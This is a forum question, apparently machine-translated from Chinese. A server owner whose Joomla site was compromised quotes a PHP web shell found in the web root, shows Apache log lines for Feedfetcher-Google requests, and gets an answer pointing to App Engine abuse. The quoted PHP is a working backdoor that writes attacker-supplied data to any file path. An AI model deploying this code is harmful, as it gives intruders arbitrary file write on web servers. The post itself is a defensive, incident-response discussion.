我的服务器最近由于Joomla和allow_url_fopen = ON而受到了攻击。我在服务器的根目录中看到有这个内容的各种php文件
Restricted accoss <?php error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); $file = "".$_POST["path"]; $fh = fopen ($file, 'w') or die(""); echo fwrite ($fh, stripslashes($_POST["raw_data"])); fclose($fh); 所以我closures了allow_url_fopen并删除了所有这些文件。 现在,我的网站在几分钟内运行正常,但是它会每隔几秒钟向这个地址发出请求,并在error_log中给出这个消息
[Thu Mar 07 00:14:00 2013] [error] [client 74.125.185.16] File does not exist: /var/www/html/index.xml
这我在access_log中看到很多时间
74.125.179.86 - - [07/Mar/2013:00:15:39 +0000] "GET /index.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+google.com/feedfetcher.html)";
那很正常吗?
看起来有人在滥用Google App Engine。 检查您的Apache访问日志中的该IP地址,并且用户代理string应该有他们的应用程序ID。 然后,您可以将滥用行为报告给Google。